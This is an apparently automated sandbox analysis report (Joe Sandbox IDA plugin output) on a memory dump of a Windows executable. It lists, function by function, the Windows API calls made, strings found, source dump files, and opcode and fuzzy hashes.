                                                                                                                                                                        • Instruction ID: 66267163d142a854da13b811d978824456808d800c4f085f2ac3ff33934cb287
                                                                                                                                                                        • Opcode Fuzzy Hash: 08c70b7bacf3d240ed67f35d8655e2b334154e3aeed38ddc6d05e142f71d822e
                                                                                                                                                                        • Instruction Fuzzy Hash: AA818D729242069BCB24EF14C854ABAB3E8BB84310F54482BF8C5D7350DB75EDA5DB92
                                                                                                                                                                        APIs
                                                                                                                                                                        • IsWindow.USER32(00000000), ref: 002F8992
                                                                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 002F899E
                                                                                                                                                                        • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 002F8A79
                                                                                                                                                                        • SendMessageW.USER32(00000000,000000B0,?,?), ref: 002F8AAC
                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,00000000), ref: 002F8AE4
                                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 002F8B06
                                                                                                                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 002F8B1E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                        • String ID: (3
                                                                                                                                                                        • API String ID: 4072528602-113007392
                                                                                                                                                                        • Opcode ID: 17bd3844b0cb4d4654994ce1e79f7ba16e1b46805b1aaa08510cb015796c3b31
                                                                                                                                                                        • Instruction ID: 5c6327851620848e837b3d95c5064d091245aeaf3d7c5afcc99ecf223695cd52
                                                                                                                                                                        • Opcode Fuzzy Hash: 17bd3844b0cb4d4654994ce1e79f7ba16e1b46805b1aaa08510cb015796c3b31
                                                                                                                                                                        • Instruction Fuzzy Hash: B471817461020EEFDB21DF54C884FBAFBB9EF09390F140469EA4597361CB71A960DB51
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 002674D7
                                                                                                                                                                          • Part of subcall function 00267567: GetClientRect.USER32(?,?), ref: 0026758D
                                                                                                                                                                          • Part of subcall function 00267567: GetWindowRect.USER32(?,?), ref: 002675CE
                                                                                                                                                                          • Part of subcall function 00267567: ScreenToClient.USER32(?,?), ref: 002675F6
                                                                                                                                                                        • GetDC.USER32 ref: 002A6083
                                                                                                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 002A6096
                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 002A60A4
                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 002A60B9
                                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 002A60C1
                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 002A6152
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                        • String ID: U
                                                                                                                                                                        • API String ID: 4009187628-3372436214
                                                                                                                                                                        • Opcode ID: 376489ef6a5f11e9f8ecddeaee7692e492d3afa17daa2e0fea826ca6b67d724c
                                                                                                                                                                        • Instruction ID: 010d49e83afaefd4e78a5898b8a3c01c6452b5c615bfd6804705629c4fc8d3c2
                                                                                                                                                                        • Opcode Fuzzy Hash: 376489ef6a5f11e9f8ecddeaee7692e492d3afa17daa2e0fea826ca6b67d724c
                                                                                                                                                                        • Instruction Fuzzy Hash: 1D71C431520206DFCF21DF64D88CABA7FB5FF46364F184269ED595A2A6CB3188A0DF50
                                                                                                                                                                        APIs
                                                                                                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002DCCB7
                                                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002DCCDF
                                                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 002DCD0F
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002DCD67
                                                                                                                                                                        • SetEvent.KERNEL32(?), ref: 002DCD7B
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 002DCD86
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3113390036-3916222277
                                                                                                                                                                        • Opcode ID: 9429c0371c371403a8962c7cea6342bd4c2fa8f301ac11f47875592b99d2c705
                                                                                                                                                                        • Instruction ID: bd3349d917a2beb6ca7a85d4b04047ffa3e8569712892bb6cbcce6e3c900fe03
                                                                                                                                                                        • Opcode Fuzzy Hash: 9429c0371c371403a8962c7cea6342bd4c2fa8f301ac11f47875592b99d2c705
                                                                                                                                                                        • Instruction Fuzzy Hash: D1319FB152060AAFD721AF649C88ABB7BFEEF45790B20452BF446D6310DB34ED14DB60
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,002A55AE,?,?,Bad directive syntax error,002FDCD0,00000000,00000010,?,?), ref: 002CA236
                                                                                                                                                                        • LoadStringW.USER32(00000000,?,002A55AE,?), ref: 002CA23D
                                                                                                                                                                          • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
                                                                                                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 002CA301
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: HandleLoadMessageModuleString_wcslen
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 858772685-4153970271
• Opcode ID: 5b455fe7283d1e7b6bebf95f1e4d4b6afcb1a351bc7703edd3fea47afdf5dd2e
• Instruction ID: f7d727f18df2561651a87c10ca3de4dba62d1e681ca9f8e3662b272c49594ba6
• Opcode Fuzzy Hash: 5b455fe7283d1e7b6bebf95f1e4d4b6afcb1a351bc7703edd3fea47afdf5dd2e
• Instruction Fuzzy Hash: 7A216F3192021EEBCF02AFA0DC0AEEE7B39BF18704F004469F515A50A2EB719668DF51
APIs
• GetParent.USER32 ref: 002C29F8
• GetClassNameW.USER32(00000000,?,00000100), ref: 002C2A0D
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 002C2A9A
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1290815626-3381328864
• Opcode ID: 68849cbbd0cac2252d26f33332afbd6a127c2e961aab1aeb8ddfc9eefa3625a4
• Instruction ID: 1088783406cbc308dca57b7b2acd39bcd692c5c8e670a8950b047be6ac9de0ab
• Opcode Fuzzy Hash: 68849cbbd0cac2252d26f33332afbd6a127c2e961aab1aeb8ddfc9eefa3625a4
• Instruction Fuzzy Hash: 9D11067A6A4317FAFA257721FC0BEE67BDC8F15724B20412AF904E40D1FFA168248A14
APIs
• GetClientRect.USER32(?,?), ref: 0026758D
• GetWindowRect.USER32(?,?), ref: 002675CE
• ScreenToClient.USER32(?,?), ref: 002675F6
• GetClientRect.USER32(?,?), ref: 0026773A
• GetWindowRect.USER32(?,?), ref: 0026775B
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Rect$Client$Window$Screen
• String ID:
• API String ID: 1296646539-0
• Opcode ID: a54955fc57ea0502e4cfc1bf9ad47ca0253d4473f5b9788d58fc10575ea09b8f
• Instruction ID: adfbc019fb808d9406879b3540e3cad2cc7304970924a8dec3608d93fa384b4a
• Opcode Fuzzy Hash: a54955fc57ea0502e4cfc1bf9ad47ca0253d4473f5b9788d58fc10575ea09b8f
• Instruction Fuzzy Hash: 4DC18C3892460ADFDB10CFA8D444BEDBBF1FF08314F14841AE895E3250DB74A9A1DB60
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: _free$EnvironmentVariable___from_strstr_to_strchr
• String ID:
• API String ID: 1282221369-0
• Opcode ID: 7090d43e367a70e62c3a2920ca074ec4c04579e7a63d22616afe9b9d57e89bee
• Instruction ID: 5c69afc7d9bc923631c5b1193a19a42c12f2f33c69c6b7f2c899765f5b7a889a
• Opcode Fuzzy Hash: 7090d43e367a70e62c3a2920ca074ec4c04579e7a63d22616afe9b9d57e89bee
• Instruction Fuzzy Hash: 58613B71D24302AFDF21AF74D981B7D7BA8DF02324F1401ADED44A7292D67199209F91
APIs
• SendMessageW.USER32(?,00002001,00000000,00000000), ref: 002F5C24
• ShowWindow.USER32(?,00000000), ref: 002F5C65
• ShowWindow.USER32(?,00000005,?,00000000), ref: 002F5C6B
• SetFocus.USER32(?,?,00000005,?,00000000), ref: 002F5C6F
  • Part of subcall function 002F79F2: DeleteObject.GDI32(00000000), ref: 002F7A1E
• GetWindowLongW.USER32(?,000000F0), ref: 002F5CAB
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 002F5CB8
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 002F5CEB
• SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 002F5D25
• SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 002F5D34
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
• String ID:
• API String ID: 3210457359-0
• Opcode ID: 7476b92455188507941edae7224c9e9950a6e2e6718ca378c932d92e87b8e4f9
• Instruction ID: cb95b585c7941dbbcaae34114d9bc95412cdb47a5a5c9fe070283ad63243223b
• Opcode Fuzzy Hash: 7476b92455188507941edae7224c9e9950a6e2e6718ca378c932d92e87b8e4f9
• Instruction Fuzzy Hash: 5351A030671A2DBFEF249F54CC49BB8BBA5AB047A4F144132F7159A1E0C7B1A9A0DF40
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002DCBC7
• GetLastError.KERNEL32 ref: 002DCBDA
• SetEvent.KERNEL32(?), ref: 002DCBEE
  • Part of subcall function 002DCC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002DCCB7
  • Part of subcall function 002DCC98: GetLastError.KERNEL32 ref: 002DCD67
  • Part of subcall function 002DCC98: SetEvent.KERNEL32(?), ref: 002DCD7B
  • Part of subcall function 002DCC98: InternetCloseHandle.WININET(00000000), ref: 002DCD86
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
• String ID:
• API String ID: 337547030-0
• Opcode ID: 8b46aeab0f78c3514901b5bd9225f155adc937096d6bd04ed8af65678370d854
• Instruction ID: dc56a74e6f8005c213b29ff64710340e9c1f8323d2327d464f29d5166f9e5b20
• Opcode Fuzzy Hash: 8b46aeab0f78c3514901b5bd9225f155adc937096d6bd04ed8af65678370d854
• Instruction Fuzzy Hash: 06318F71120702AFCB219F65DD48A7ABBA9FF08354B20452FFA5A86710C731EC24EB60
APIs
  • Part of subcall function 002C4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 002C43AD
  • Part of subcall function 002C4393: GetCurrentThreadId.KERNEL32 ref: 002C43B4
  • Part of subcall function 002C4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002C2F00), ref: 002C43BB
• MapVirtualKeyW.USER32(00000025,00000000), ref: 002C2F0A
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002C2F28
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 002C2F2C
• MapVirtualKeyW.USER32(00000025,00000000), ref: 002C2F36
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 002C2F4E
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 002C2F52
• MapVirtualKeyW.USER32(00000025,00000000), ref: 002C2F5C
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 002C2F70
• Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 002C2F74
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2014098862-0
                                                                                                                                                                        • Opcode ID: b1e656faae621d60107600b3c3ec2cd8553e584251a4c8c9c94e35ea6d3536ed
                                                                                                                                                                        • Instruction ID: ff11115fd401f74cb3d341aa95f09e8ab22a4fe130786f19e727c1c81fea3e1d
                                                                                                                                                                        • Opcode Fuzzy Hash: b1e656faae621d60107600b3c3ec2cd8553e584251a4c8c9c94e35ea6d3536ed
                                                                                                                                                                        • Instruction Fuzzy Hash: E501D830794214BBFB106768AC8EF6A3F5ADB5DB61F100025F318AF1E0C9E15454CEA9
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,002C1D95,?,?,00000000), ref: 002C2159
• HeapAlloc.KERNEL32(00000000,?,002C1D95,?,?,00000000), ref: 002C2160
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,002C1D95,?,?,00000000), ref: 002C2175
• GetCurrentProcess.KERNEL32(?,00000000,?,002C1D95,?,?,00000000), ref: 002C217D
• DuplicateHandle.KERNEL32(00000000,?,002C1D95,?,?,00000000), ref: 002C2180
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,002C1D95,?,?,00000000), ref: 002C2190
• GetCurrentProcess.KERNEL32(002C1D95,00000000,?,002C1D95,?,?,00000000), ref: 002C2198
• DuplicateHandle.KERNEL32(00000000,?,002C1D95,?,?,00000000), ref: 002C219B
• CreateThread.KERNEL32(00000000,00000000,002C21C1,00000000,00000000,00000000), ref: 002C21B5
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
• Opcode ID: 51b0b74df808cf4b1d37996fbbcb818ca46e4d417a0af01a9245a23e5a6b4c38
• Instruction ID: 9fa78e2f14369f8cd1ab1386fbc9ce762e4ef8434aef387d74817e00586f6777
• Opcode Fuzzy Hash: 51b0b74df808cf4b1d37996fbbcb818ca46e4d417a0af01a9245a23e5a6b4c38
• Instruction Fuzzy Hash: 1201BFB5240308BFE710AF65EC4DF6B7BADEB89751F004421FA05DB1A1CA709814CB20
APIs
• Part of subcall function 002641EA: _wcslen.LIBCMT ref: 002641EF
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002CCF99
• _wcslen.LIBCMT ref: 002CCFE0
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002CD047
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 002CD075
Strings
Similarity
• API ID: ItemMenu$Info_wcslen$Default
• String ID: ,*3$0$<*3
• API String ID: 1227352736-2625098317
• Opcode ID: d2eee50d6a49358c63badd62bf27ad4e5112eefec8bde0c180c8fce012725308
• Instruction ID: 7c08bb16db5b380eda6aea3049c5e2a6543557390d5be8f8d2ad0e70acbb08e4
• Opcode Fuzzy Hash: d2eee50d6a49358c63badd62bf27ad4e5112eefec8bde0c180c8fce012725308
• Instruction Fuzzy Hash: 3051DF716243029BD715AF28C885F6BB7E8AF45324F040B3EF999D22D1DBB0C965CB52
APIs
• Part of subcall function 002CDD87: CreateToolhelp32Snapshot.KERNEL32 ref: 002CDDAC
• Part of subcall function 002CDD87: Process32FirstW.KERNEL32(00000000,?), ref: 002CDDBA
• Part of subcall function 002CDD87: CloseHandle.KERNEL32(00000000), ref: 002CDE87
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 002EABCA
• GetLastError.KERNEL32 ref: 002EABDD
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 002EAC10
• TerminateProcess.KERNEL32(00000000,00000000), ref: 002EACC5
• GetLastError.KERNEL32(00000000), ref: 002EACD0
• CloseHandle.KERNEL32(00000000), ref: 002EAD21
Strings
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
• Opcode ID: 39e12e07f3350d76a7e60314751e182c1f307d41efd982b398120038463d332f
• Instruction ID: f0092af5809d8e51b65a1cd4e224c99c2c83e62e5a915306f5b4c02236a5a17a
• Opcode Fuzzy Hash: 39e12e07f3350d76a7e60314751e182c1f307d41efd982b398120038463d332f
• Instruction Fuzzy Hash: 8361BE742242829FD710DF19C894F25BBE1AF54318F58849CE4664BBA3C771FC99CB92
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 002F43C1
• SendMessageW.USER32(00000000,00001036,00000000,?), ref: 002F43D6
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002F43F0
• _wcslen.LIBCMT ref: 002F4435
• SendMessageW.USER32(?,00001057,00000000,?), ref: 002F4462
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 002F4490
Strings
Similarity
• API ID: MessageSend$Window_wcslen
• String ID: SysListView32
• API String ID: 2147712094-78025650
• Opcode ID: 930d738be03bcadab900ab3b859d9036ffbb612f10e1d012df2de2984944f615
• Instruction ID: 583d4a5f7dd03ea9cf496ba6d51360122dd2d7b3acd5f821a79842bef917dde4
• Opcode Fuzzy Hash: 930d738be03bcadab900ab3b859d9036ffbb612f10e1d012df2de2984944f615
• Instruction Fuzzy Hash: D841B23191031DABDB11AF64DC49BEBB7A9EB08390F100126FA14E7291D7B099A0CB90
APIs
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002CC6C4
• IsMenu.USER32(00000000), ref: 002CC6E4
• CreatePopupMenu.USER32 ref: 002CC71A
• GetMenuItemCount.USER32(017160F8), ref: 002CC76B
• InsertMenuItemW.USER32(017160F8,?,00000001,00000030), ref: 002CC793
Strings
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                        • String ID: 0$2
                                                                                                                                                                        • API String ID: 93392585-3793063076
APIs
• GetCursorPos.USER32(?), ref: 002619E1
• ScreenToClient.USER32(00000000,?), ref: 002619FE
• GetAsyncKeyState.USER32(00000001), ref: 00261A23
• GetAsyncKeyState.USER32(00000002), ref: 00261A3D
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID: $'&$$'&
• API String ID: 4210589936-3932867606
APIs
  • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
• BeginPaint.USER32(?,?,?), ref: 00261B35
• GetWindowRect.USER32(?,?), ref: 00261B99
• ScreenToClient.USER32(?,?), ref: 00261BB6
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00261BC7
• EndPaint.USER32(?,?,?,?,?), ref: 00261C15
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 002A3287
  • Part of subcall function 00261C2D: BeginPath.GDI32(00000000), ref: 00261C4B
Similarity
• API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
• String ID: (3
• API String ID: 3050599898-113007392
APIs
• GetWindowLongW.USER32(?,000000F0), ref: 002F8740
• SetWindowLongW.USER32(00000000,000000F0,?), ref: 002F8765
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 002F877D
• GetSystemMetrics.USER32(00000004), ref: 002F87A6
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,002DC1F2,00000000), ref: 002F87C6
  • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
• GetSystemMetrics.USER32(00000004), ref: 002F87B1
Similarity
• API ID: Window$Long$MetricsSystem
• String ID: (3
• API String ID: 2294984445-113007392
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 002CD1BE
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2457776203-404129466
APIs
Similarity
• API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 642191829-3771769585
APIs
Similarity
• API ID: _wcslen$LocalTime
• String ID:
• API String ID: 952045576-0
                                                                                                                                                                        • Opcode ID: 7f1aa57701a535da78eb5bd810d3e73d3e3dabc829a8e7b869096a061c09c6d2
                                                                                                                                                                        • Instruction ID: 7e15f33a981e885d4eea212d0e29be5053c38f40bce6bb5860b13a0665d5491b
                                                                                                                                                                        • Opcode Fuzzy Hash: 7f1aa57701a535da78eb5bd810d3e73d3e3dabc829a8e7b869096a061c09c6d2
                                                                                                                                                                        • Instruction Fuzzy Hash: BB41A469C2221965DB11FBB48C8AFCFB37DAF05310F008526E508E31A1FA34E275C7A6
                                                                                                                                                                        APIs
                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 002F37B7
                                                                                                                                                                        • GetDC.USER32(00000000), ref: 002F37BF
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002F37CA
                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 002F37D6
                                                                                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 002F3812
                                                                                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 002F3823
                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,002F6504,?,?,000000FF,00000000,?,000000FF,?), ref: 002F385E
                                                                                                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 002F387D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
